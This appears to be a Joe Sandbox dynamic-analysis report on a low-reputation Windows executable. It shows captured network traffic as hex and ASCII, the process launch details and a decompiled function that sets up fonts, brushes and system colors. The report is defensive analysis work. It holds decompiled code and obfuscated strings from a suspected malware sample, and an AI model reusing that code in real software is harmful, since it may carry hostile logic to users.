2022-10-07 14:00:15 UTC	1298	IN	Data Raw: 6b 72 48 2d 46 6a 42 32 4b 6d 79 63 5a 47 35 63 39 6b 64 42 59 35 53 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65 76 65 6e 74 73 3a 74 72 75 65 2c 67 72 61 70 Data Ascii: krH-FjB2KmycZG5c9kdBY5SQ"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_events:true,grap
2022-10-07 14:00:15 UTC	1300	IN	Data Raw: 74 30 5f 4a 43 58 75 65 4c 76 73 42 6c 52 6d 4c 5a 4f 59 71 6a 4a 6d 71 58 79 63 32 6d 73 44 73 76 6c 47 56 5f 34 46 64 41 66 5f 36 79 48 66 6c 2d 58 69 33 4e 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 55 63 78 71 68 44 55 47 38 52 71 50 42 66 59 4f 4d 31 43 7a 47 42 77 77 35 51 6a 6d 59 78 4b 51 36 61 2d 41 76 72 44 31 38 78 54 39 76 34 7a 55 46 56 75 42 63 6a 6a 6b 72 48 2d 46 6a 42 32 4b 6d 79 63 5a 47 35 63 39 6b 64 42 59 35 53 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 37 22 2c 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f 64 2e Data Ascii: t0_JCXueLvsBlRmLZOYqjJmqXyc2msDsvlGV_4FdAf_6yHfl-Xi3NQ"]},-1],["cr:983844",[],{__rc:[null,"Aa3UcxqhDUG8RqPBfYOM1CzGBww5QjmYxKQ6a-AvrD18xT9v4zUFVuBcjjkrH-FjB2KmycZG5c9kdBY5SQ"]},-1],["cr:1344487",["ReactDOMForked-prod.classic"],{__rc:["ReactDOMForked-prod.
2022-10-07 14:00:15 UTC	1301	IN	Data Raw: 68 47 6f 2d 56 64 62 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 33 69 46 55 61 73 36 6b 39 68 35 38 64 4a 6e 43 5a 59 39 44 7a 31 5f 53 62 30 46 4f 55 4d 6e 49 4d 38 6c 66 2d 6d 51 42 72 67 56 6b 4d 46 70 79 44 6a 53 31 42 4c 49 69 58 4a 49 4f 41 6b 72 6d 41 38 59 43 79 6f 4d 62 4e 51 6c 61 45 56 77 32 68 68 47 6f 2d 56 64 62 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 4e 61 76 69 67 61 74 69 Data Ascii: hGo-Vdbg"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa3iFUas6k9h58dJnCZY9Dz1_Sb0FOUMnIM8lf-mQBrgVkMFpyDjS1BLIiXJIOAkrmA8YCyoMbNQlaEVw2hhGo-Vdbg"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["Navigati
2022-10-07 14:00:15 UTC	1303	IN	Data Raw: 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 2c 73 65 72 76 65 72 4c 49 44 3a 22 37 31 35 31 37 37 30 30 31 31 38 36 36 34 36 35 37 37 38 22 7d 5d 5d 2c 5b 22 46 61 6c 63 6f 4c 6f 67 67 65 72 54 72 61 6e 73 70 6f 72 74 73 22 2c 22 61 74 74 61 63 68 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 43 6c 69 63 6b 52 65 66 4c 6f 67 67 65 72 22 5d 2c 5b 22 44 65 74 65 63 74 42 72 6f 6b 65 6e 50 72 6f 78 79 43 Data Ascii: A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E",serverLID:"7151770011866465778"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyC

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 38b2c7a1af454d382927f81543d86055886bc02863457.exePID: 5888, Parent PID: 3324

General

Target ID:	3
Start time:	15:58:22
Start date:	07/10/2022
Path:	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe
Imagebase:	0xca0000
File size:	1107968 bytes
MD5 hash:	78C42D6817AF1AD96CABDF6FF2F7F3DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 38b2c7a1af454d382927f81543d86055886bc02863457.exePID: 1812, Parent PID: 3324

General

Target ID:	4
Start time:	15:58:35
Start date:	07/10/2022
Path:	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe"
Imagebase:	0xca0000
File size:	1107968 bytes
MD5 hash:	78C42D6817AF1AD96CABDF6FF2F7F3DA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 38b2c7a1af454d382927f81543d86055886bc02863457.exePID: 5128, Parent PID: 3324

General

Target ID:	5
Start time:	15:58:43
Start date:	07/10/2022
Path:	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe"
Imagebase:	0xca0000
File size:	1107968 bytes
MD5 hash:	78C42D6817AF1AD96CABDF6FF2F7F3DA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 38b2c7a1af454d382927f81543d86055886bc02863457.exePID: 5888, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1%
Total number of Nodes:	2000
Total number of Limit Nodes:	57

Executed Functions

Function 00CACD24 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 489
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00CACE58
_memset.LIBCMT ref: 00CACE78

Strings

Kgjm, xrefs: 00CACE09
wcwi`xTckh, xrefs: 00CAD1D3
HU~{Fhainz|, xrefs: 00CACD52
JdmAm^jnak, xrefs: 00CACE2B
T, xrefs: 00CAD2A8

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memset
String ID: HU~{Fhainz|$JdmAm^jnak$Kgjm$T$wcwi`xTckh
API String ID: 2102423945-1427305012
Opcode ID: 2714970d429f0647d75db33c133534305a7da6c29903cbd5eb9ede64236a1a3b
Instruction ID: 098a4e68b2ac1bb3b69f9c69ce7d6e66dd11d598a307a0e0a810fbdbb5287943
Opcode Fuzzy Hash: 2714970d429f0647d75db33c133534305a7da6c29903cbd5eb9ede64236a1a3b
Instruction Fuzzy Hash: A2F17FB194121ABEEF229B64DC4AFFFBBBCEF06350F1041A9B519A6181D6705F418B60

Uniqueness

Uniqueness Score: -1.00%

Function 00D3347C Relevance: 70.4, APIs: 35, Strings: 5, Instructions: 382
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00D3347C(intOrPtr* __ecx, signed int __edx, struct tagLOGFONTW __fp0) {
				signed char _t238;
				void* _t239;
				void* _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t244;
				void* _t245;
				void* _t246;
				void* _t247;
				void* _t248;
				struct tagLOGFONTW _t257;
				signed int _t264;
				struct HFONT__* _t289;
				void* _t291;
				long _t304;
				struct tagLOGFONTW _t305;
				long _t306;
				intOrPtr _t307;
				long _t310;
				long _t311;
				long _t312;
				long _t313;
				long _t314;
				long _t315;
				long _t320;
				long _t330;
				long _t331;
				struct HBRUSH__* _t332;
				struct HBRUSH__* _t333;
				struct HBRUSH__* _t335;
				struct HBRUSH__* _t337;
				struct HPEN__* _t358;
				void* _t372;
				long _t395;
				long _t397;
				struct tagLOGFONTW _t400;
				void* _t402;
				struct HFONT__* _t415;
				int _t418;
				int _t419;
				WCHAR* _t420;
				char _t446;
				intOrPtr _t447;
				signed char _t449;
				intOrPtr* _t465;
				signed int _t515;
				struct tagLOGFONTW _t518;
				intOrPtr _t523;
				intOrPtr* _t524;
				intOrPtr* _t525;
				struct tagLOGFONTW _t526;
				struct tagLOGFONTW _t539;
				void* _t545;
				signed long long _t582;

				_t515 = __edx;
				0xe21503(0x478);
				_t525 = __ecx;
				E00D19FA4(_t545 - 0x484);
				 *(_t545 - 4) = 0;
				_t238 =  *0xe8e184( *((intOrPtr*)(_t545 - 0x47c)), 0x58, 0);
				 *(_t545 - 0x460) = _t238;
				asm("fild dword [ebp-0x460]");
				 *(_t545 - 0x460) = __fp0;
				_t582 =  *(_t545 - 0x460) /  *0xea5308;
				asm("fst qword [esi+0x1dc]");
				asm("fld1");
				asm("fcom st0, st1");
				asm("fnstsw ax");
				if((_t238 & 0x00000005) != 0) {
					st1 = _t582;
					L4:
					st0 = _t582;
				} else {
					_t582 =  *0xea52f8;
					asm("fcomp st0, st2");
					asm("fnstsw ax");
					st1 = _t582;
					if((_t238 & 0x00000041) != 0) {
						goto L4;
					} else {
						 *(_t525 + 0x1dc) = _t582;
					}
				}
				_t239 = _t525 + 0x11c;
				if(_t239 != 0 &&  *((intOrPtr*)(_t239 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t239, _t515));
				}
				_t240 = _t525 + 0x124;
				if(_t240 != 0 &&  *((intOrPtr*)(_t240 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t240, _t515));
				}
				_t241 = _t525 + 0x12c;
				if(_t241 != 0 &&  *((intOrPtr*)(_t241 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t241, _t515));
				}
				_t242 = _t525 + 0x134;
				if(_t242 != 0 &&  *((intOrPtr*)(_t242 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t242, _t515));
				}
				_t243 = _t525 + 0x13c;
				if(_t243 != 0 &&  *((intOrPtr*)(_t243 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t243, _t515));
				}
				_t244 = _t525 + 0x144;
				if(_t244 != 0 &&  *((intOrPtr*)(_t244 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t244, _t515));
				}
				_t245 = _t525 + 0x14c;
				if(_t245 != 0 &&  *((intOrPtr*)(_t245 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t245, _t515));
				}
				_t246 = _t525 + 0x154;
				if(_t246 != 0 &&  *((intOrPtr*)(_t246 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t246, _t515));
				}
				_t247 = _t525 + 0x164;
				if(_t247 != 0 &&  *((intOrPtr*)(_t247 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t247, _t515));
				}
				_t248 = _t525 + 0x15c;
				if(_t248 != 0 &&  *((intOrPtr*)(_t248 + 4)) != 0) {
					DeleteObject(E00D1AA2D(0, _t248, _t515));
				}
				 *((intOrPtr*)(_t545 - 0x264)) = 0x1f8;
				E00D32F84(_t525, _t545 - 0x264); // executed
				0xe23f30(_t545 - 0x6c, 0, 0x5c);
				 *((char*)(_t545 - 0x55)) = GetTextCharsetInfo( *(_t545 - 0x480), 0, 0);
				 *(_t545 - 0x5c) =  *(_t545 - 0x174);
				 *((char*)(_t545 - 0x58)) =  *((intOrPtr*)(_t545 - 0x170));
				asm("cdq");
				_t257 = ( *(_t545 - 0x184) ^ _t515) - _t515;
				if(_t257 > 0xc) {
					__eflags =  *(_t525 + 8);
					if( *(_t525 + 8) == 0) {
						_t257 = _t257 - 1;
						__eflags = _t257;
					}
				} else {
					_t257 = 0xb;
				}
				if( *(_t545 - 0x184) < 0) {
					_t257 =  ~_t257;
				}
				 *(_t545 - 0x6c) = _t257;
				lstrcpyW(_t545 - 0x50, _t545 - 0x168);
				if( *((intOrPtr*)(_t525 + 4)) == 0 &&  *((char*)(_t545 - 0x16d)) <= 2) {
					_t418 = EnumFontFamiliesW( *(_t545 - 0x480), 0, 0xd32e22, L"Segoe UI"); // executed
					if(_t418 != 0) {
						_t419 = EnumFontFamiliesW( *(_t545 - 0x480), 0, 0xd32e22, L"Tahoma");
						__eflags = _t419;
						_t420 = _t545 - 0x50;
						if(_t419 != 0) {
							_push(L"MS Sans Serif");
						} else {
							_push(L"Tahoma");
						}
						lstrcpyW(_t420, ??);
					} else {
						lstrcpyW(_t545 - 0x50, L"Segoe UI");
						 *((char*)(_t545 - 0x52)) = 5;
					}
				}
				_t445 =  *0xe8e0ac;
				E00D1A8DA( *0xe8e0ac, _t525 + 0x11c, _t515, CreateFontIndirectW(_t545 - 0x6c));
				_t264 =  *(_t545 - 0x6c);
				 *(_t545 - 0x460) = _t264;
				0xe296c6(_t264);
				 *(_t545 - 0x46c) = _t264;
				asm("fild dword [ebp-0x46c]");
				 *(_t545 - 0x470) = _t582;
				asm("fld1");
				asm("faddp st1, st0");
				0xe296e0();
				 *(_t545 - 0x6c) = _t264;
				if( *(_t545 - 0x460) < 0) {
					 *(_t545 - 0x6c) =  ~_t264;
				}
				E00D1A8DA(_t445, _t525 + 0x15c, _t515, CreateFontIndirectW(_t545 - 0x6c));
				 *(_t545 - 0x6c) =  *(_t545 - 0x460);
				 *((intOrPtr*)(_t545 - 0x45c)) = 0x1f8;
				E00D32F84(_t525, _t545 - 0x45c);
				 *((char*)(_t545 - 0x58)) =  *((intOrPtr*)(_t545 - 0x30c));
				 *(_t545 - 0x5c) =  *(_t545 - 0x310);
				E00D1A8DA(_t445, _t525 + 0x124, _t515, CreateFontIndirectW(_t545 - 0x6c));
				 *((char*)(_t545 - 0x58)) =  *((intOrPtr*)(_t545 - 0x170));
				 *(_t545 - 0x5c) =  *(_t545 - 0x174);
				 *((char*)(_t545 - 0x57)) = 1;
				E00D1A8DA(_t445, _t525 + 0x13c, _t515, CreateFontIndirectW(_t545 - 0x6c));
				 *((char*)(_t545 - 0x57)) = 0;
				 *(_t545 - 0x5c) = 0x2bc;
				E00D1A8DA(_t445, _t525 + 0x12c, _t515, CreateFontIndirectW(_t545 - 0x6c));
				_t446 =  *((intOrPtr*)(_t545 - 0x55));
				 *(_t545 - 0x5c) =  *(_t545 - 0x5c) & 0x00000000;
				 *((char*)(_t545 - 0x55)) = 2;
				 *(_t545 - 0x6c) = GetSystemMetrics(0x48) - 1;
				lstrcpyW(_t545 - 0x50, L"Marlett");
				_t289 = CreateFontIndirectW(_t545 - 0x6c);
				_t461 = _t525 + 0x164;
				E00D1A8DA(_t446, _t525 + 0x164, _t515, _t289);
				 *(_t545 - 0x464) =  *(_t545 - 0x464) & 0x00000000;
				 *((char*)(_t545 - 0x55)) = _t446;
				 *((intOrPtr*)(_t545 - 0x468)) = 0xea0394;
				 *(_t545 - 4) = 1;
				_t291 = GetStockObject(0x11);
				_t447 =  *0xe8e170;
				 *(_t545 - 0x464) = _t291;
				if(_t291 != 0) {
					_t461 = _t545 - 0x6c;
					if(GetObjectW(_t291, 0x5c, _t545 - 0x6c) != 0) {
						 *(_t545 - 0x6c) =  *(_t545 - 0x184);
						 *(_t545 - 0x5c) =  *(_t545 - 0x174);
						 *((char*)(_t545 - 0x58)) =  *((intOrPtr*)(_t545 - 0x170));
						 *((intOrPtr*)(_t545 - 0x60)) = 0x384;
						 *((intOrPtr*)(_t545 - 0x64)) = 0xa8c;
						lstrcpyW(_t545 - 0x50, L"Arial");
						E00D1A8DA(_t447, _t525 + 0x14c, _t515, CreateFontIndirectW(_t545 - 0x6c));
						 *((intOrPtr*)(_t545 - 0x64)) = 0x384;
						_t415 = CreateFontIndirectW(_t545 - 0x6c);
						_t461 = _t525 + 0x154;
						E00D1A8DA(_t447, _t525 + 0x154, _t515, _t415);
					}
				}
				GetObjectW( *(E00D1AB49(_t447, _t461, _t515, _t525, GetStockObject(0x11)) + 4), 0x5c, _t545 - 0x6c);
				 *((char*)(_t545 - 0x57)) = 1;
				E00D1A8DA(_t447, _t525 + 0x144, _t515, CreateFontIndirectW(_t545 - 0x6c));
				 *((char*)(_t545 - 0x57)) = 0;
				 *(_t545 - 0x5c) = 0x2bc;
				E00D1A8DA(_t447, _t525 + 0x134, _t515, CreateFontIndirectW(_t545 - 0x6c));
				_t465 = _t525; // executed
				E00D33D53(_t465, _t515);
				_t526 =  *0xf0e17c; // 0x0
				while(_t526 != 0) {
					_t518 = _t526;
					__eflags = _t526;
					if(_t526 == 0) {
						L61:
						E00D0BD09(_t465);
						asm("int3");
						0xe214d0(0x24);
						_t448 = _t465;
						 *((intOrPtr*)(_t545 - 0x14)) = _t448;
						_t304 = GetSysColor(0x16);
						__eflags = _t304 - 0xffffff;
						if(_t304 != 0xffffff) {
							L65:
							_t305 = 0;
							__eflags = 0;
						} else {
							_t397 = GetSysColor(0xf);
							__eflags = _t397;
							if(_t397 != 0) {
								goto L65;
							} else {
								_t305 = _t397 + 1;
							}
						}
						 *(_t448 + 0x184) = _t305;
						_t306 = GetSysColor(0x15);
						__eflags = _t306;
						if(_t306 != 0) {
							L69:
							_t307 = 0;
							__eflags = 0;
						} else {
							_t395 = GetSysColor(0xf);
							__eflags = _t395 - 0xffffff;
							if(_t395 != 0xffffff) {
								goto L69;
							} else {
								_t307 = 1;
							}
						}
						 *((intOrPtr*)(_t448 + 0x188)) = _t307;
						E00D19FA4(_t545 - 0x30);
						 *(_t545 - 4) =  *(_t545 - 4) & 0x00000000;
						 *((intOrPtr*)(_t448 + 0x1ac)) =  *0xe8e184( *((intOrPtr*)(_t545 - 0x28)), 0xc, 0);
						_t310 = GetSysColor(0xf);
						 *(_t448 + 0x1c) = _t310;
						 *(_t448 + 0x54) = _t310;
						_t311 = GetSysColor(0x10);
						 *(_t448 + 0x20) = _t311;
						 *(_t448 + 0x58) = _t311;
						_t312 = GetSysColor(0x15);
						 *(_t448 + 0x30) = _t312;
						 *(_t448 + 0x60) = _t312;
						_t313 = GetSysColor(0x16);
						 *(_t448 + 0x34) = _t313;
						 *(_t448 + 0x64) = _t313;
						_t314 = GetSysColor(0x14);
						 *(_t448 + 0x24) = _t314;
						 *(_t448 + 0x5c) = _t314;
						_t315 = GetSysColor(0x12);
						 *(_t448 + 0x28) = _t315;
						 *(_t448 + 0x68) = _t315;
						 *((intOrPtr*)(_t448 + 0x38)) = GetSysColor(0x11);
						 *((intOrPtr*)(_t448 + 0x2c)) = GetSysColor(6);
						 *(_t448 + 0x3c) = GetSysColor(0xd);
						 *((intOrPtr*)(_t448 + 0x40)) = GetSysColor(0xe);
						_t320 = GetSysColor(5);
						 *(_t448 + 0x6c) = _t320;
						 *(_t448 + 0x50) = _t320;
						 *(_t448 + 0x70) = GetSysColor(8);
						 *((intOrPtr*)(_t448 + 0x74)) = GetSysColor(9);
						 *((intOrPtr*)(_t448 + 0x78)) = GetSysColor(7);
						 *(_t448 + 0x7c) = GetSysColor(2);
						 *(_t448 + 0x80) = GetSysColor(3);
						 *((intOrPtr*)(_t448 + 0x88)) = GetSysColor(0x1b);
						 *((intOrPtr*)(_t448 + 0x8c)) = GetSysColor(0x1c);
						 *((intOrPtr*)(_t448 + 0x90)) = GetSysColor(0xa);
						 *((intOrPtr*)(_t448 + 0x94)) = GetSysColor(0xb);
						_t330 = GetSysColor(0x13);
						__eflags =  *(_t448 + 0x184);
						 *(_t448 + 0x84) = _t330;
						if( *(_t448 + 0x184) == 0) {
							_t331 = GetSysColor(0x1a);
							 *(_t448 + 0x48) = 0xff0000;
							 *(_t448 + 0x4c) = 0x800080;
						} else {
							_t331 =  *(_t448 + 0x70);
							 *(_t448 + 0x48) = _t331;
							 *(_t448 + 0x4c) = _t331;
						}
						 *(_t448 + 0x44) = _t331;
						_t332 = GetSysColorBrush(0x10);
						 *(_t448 + 0x14) = _t332;
						__eflags = _t332;
						_t468 = 0 | __eflags != 0x00000000;
						if(__eflags == 0) {
							L74:
							E00D0BD09(_t468);
						}
						_t333 = GetSysColorBrush(0x14);
						 *(_t448 + 0x10) = _t333;
						__eflags = _t333;
						_t468 = 0 | __eflags != 0x00000000;
						if(__eflags == 0) {
							goto L74;
						}
						_t335 = GetSysColorBrush(5);
						 *(_t448 + 0x18) = _t335;
						__eflags = _t335;
						_t468 = 0 | __eflags != 0x00000000;
						if(__eflags == 0) {
							goto L74;
						}
						E00D1A9E6(_t448 + 0x98);
						_t337 = CreateSolidBrush( *(_t448 + 0x1c)); // executed
						E00D1A8DA(_t448, _t448 + 0x98, _t515, _t337);
						E00D1A9E6(_t448 + 0xd0);
						E00D1A8DA(_t448, _t448 + 0xd0, _t515, CreateSolidBrush( *(_t448 + 0x54)));
						E00D1A9E6(_t448 + 0xb8);
						E00D1A8DA(_t448, _t448 + 0xb8, _t515, CreateSolidBrush( *(_t448 + 0x7c)));
						E00D1A9E6(_t448 + 0xc0);
						E00D1A8DA(_t448, _t448 + 0xc0, _t515, CreateSolidBrush( *(_t448 + 0x80)));
						E00D1A9E6(_t448 + 0xa0);
						E00D1A8DA(_t448, _t448 + 0xa0, _t515, CreateSolidBrush( *(_t448 + 0x3c)));
						E00D1A9E6(_t448 + 0xb0);
						E00D1A8DA(_t448, _t448 + 0xb0, _t515, CreateSolidBrush( *(_t448 + 0x30)));
						E00D1A9E6(_t448 + 0xc8);
						E00D1A8DA(_t448, _t448 + 0xc8, _t515, CreateSolidBrush( *(_t448 + 0x6c)));
						E00D1A9E6(_t448 + 0xd8);
						_t358 = CreatePen(0, 1,  *0xf0d5b4); // executed
						E00D1A8DA(_t448, _t448 + 0xd8, _t515, _t358);
						E00D1A9E6(_t448 + 0xe0);
						E00D1A8DA(_t448, _t448 + 0xe0, _t515, CreatePen(0, 1,  *0xf0d5cc));
						E00D1A9E6(_t448 + 0xe8);
						E00D1A8DA(_t448, _t448 + 0xe8, _t515, CreatePen(0, 1,  *0xf0d5d0));
						_t539 = _t448 + 0xa8;
						__eflags = _t539;
						if(_t539 != 0) {
							__eflags =  *(_t539 + 4);
							if( *(_t539 + 4) != 0) {
								E00D1A9E6(_t539);
							}
						}
						__eflags =  *((intOrPtr*)(_t448 + 0x1ac)) - 8;
						if( *((intOrPtr*)(_t448 + 0x1ac)) <= 8) {
							__eflags = E00D32A91( *((intOrPtr*)(_t545 - 0x2c)));
							_t468 = 0 | __eflags != 0x00000000;
							if(__eflags == 0) {
								goto L74;
							} else {
								_t224 = _t545 - 0x18;
								 *_t224 =  *(_t545 - 0x18) & 0x00000000;
								__eflags =  *_t224;
								 *((intOrPtr*)(_t545 - 0x1c)) = 0xea00f4;
								 *(_t545 - 4) = 1;
								E00D1A8DA(_t448, _t545 - 0x1c, _t515, _t366);
								E00D1A8DA(_t448, _t539, _t515, CreatePatternBrush( *(_t545 - 0x18)));
								 *(_t545 - 4) = 0;
								 *((intOrPtr*)(_t545 - 0x1c)) = 0xea00f4;
								E00D1A062(_t545 - 0x1c);
							}
						} else {
							_t523 =  *((intOrPtr*)(_t545 - 0x14));
							_t449 =  *((intOrPtr*)(_t448 + 0x1e));
							 *(_t545 - 0x10) =  *(_t448 + 0x1d) & 0x000000ff;
							 *(_t545 - 0xd) =  *((intOrPtr*)(_t523 + 0x1c));
							asm("cdq");
							_t448 =  *(_t545 - 0x10);
							asm("cdq");
							asm("cdq");
							E00D1A8DA( *(_t545 - 0x10), _t523 + 0xa8, _t515, CreateSolidBrush((((( *(_t523 + 0x26) & 0x000000ff) - (_t449 & 0x000000ff) - _t515 >> 0x00000001) + _t449 & 0x000000ff) << 0x00000008 | (( *(_t523 + 0x25) & 0x000000ff) - ( *(_t545 - 0x10) & 0x000000ff) - _t515 >> 0x00000001) +  *(_t545 - 0x10) & 0x000000ff) << 0x00000008 | (( *(_t523 + 0x24) & 0x000000ff) - ( *(_t545 - 0xd) & 0x000000ff) - _t515 >> 0x00000001) +  *(_t545 - 0xd) & 0x000000ff));
						}
						E00D39F05();
						_t233 = _t545 - 4;
						 *_t233 =  *(_t545 - 4) | 0xffffffff;
						__eflags =  *_t233;
						 *0xf0ed90 = 1;
						_t372 = E00D1A178(_t448, _t545 - 0x30, _t515,  *_t233);
						0xe2149e();
						return _t372;
					} else {
						_t524 =  *((intOrPtr*)(_t518 + 8));
						_t526 =  *_t526;
						_t524 = _t524 != 0;
						if(_t524 != 0) {
							goto L61;
						} else {
							_t400 = E00D141C3(_t447, _t465, _t515,  *((intOrPtr*)(_t524 + 0x20)));
							__eflags = _t400;
							if(_t400 != 0) {
								_t465 = _t524;
								 *((intOrPtr*)( *_t524 + 0x3a4))();
							}
							continue;
						}
					}
					L85:
				}
				 *(_t545 - 4) = 0;
				 *((intOrPtr*)(_t545 - 0x468)) = 0xea0394;
				E00D1A062(_t545 - 0x468); // executed
				 *(_t545 - 4) =  *(_t545 - 4) | 0xffffffff;
				_t402 = E00D1A178(_t447, _t545 - 0x484, _t515,  *(_t545 - 4));
				0xe214b2();
				return _t402;
				goto L85;
			}

0x00d3347c
0x00d33486
0x00d3348b
0x00d33496
0x00d334a3
0x00d334a6
0x00d334ac
0x00d334b2
0x00d334b8
0x00d334c4
0x00d334ca
0x00d334d0
0x00d334d2
0x00d334d4
0x00d334d9
0x00d334f4
0x00d334f6
0x00d334f6
0x00d334db
0x00d334db
0x00d334e1
0x00d334e3
0x00d334e5
0x00d334ea
0x00000000
0x00d334ec
0x00d334ec
0x00d334ec
0x00d334ea
0x00d334fe
0x00d33506
0x00d33516
0x00d33516
0x00d33518
0x00d33520
0x00d33530
0x00d33530
0x00d33532
0x00d3353a
0x00d3354a
0x00d3354a
0x00d3354c
0x00d33554
0x00d33564
0x00d33564
0x00d33566
0x00d3356e
0x00d3357e
0x00d3357e
0x00d33580
0x00d33588
0x00d33598
0x00d33598
0x00d3359a
0x00d335a2
0x00d335b2
0x00d335b2
0x00d335b4
0x00d335bc
0x00d335cc
0x00d335cc
0x00d335ce
0x00d335d6
0x00d335e6
0x00d335e6
0x00d335e8
0x00d335f0
0x00d33600
0x00d33600
0x00d33608
0x00d33615
0x00d33621
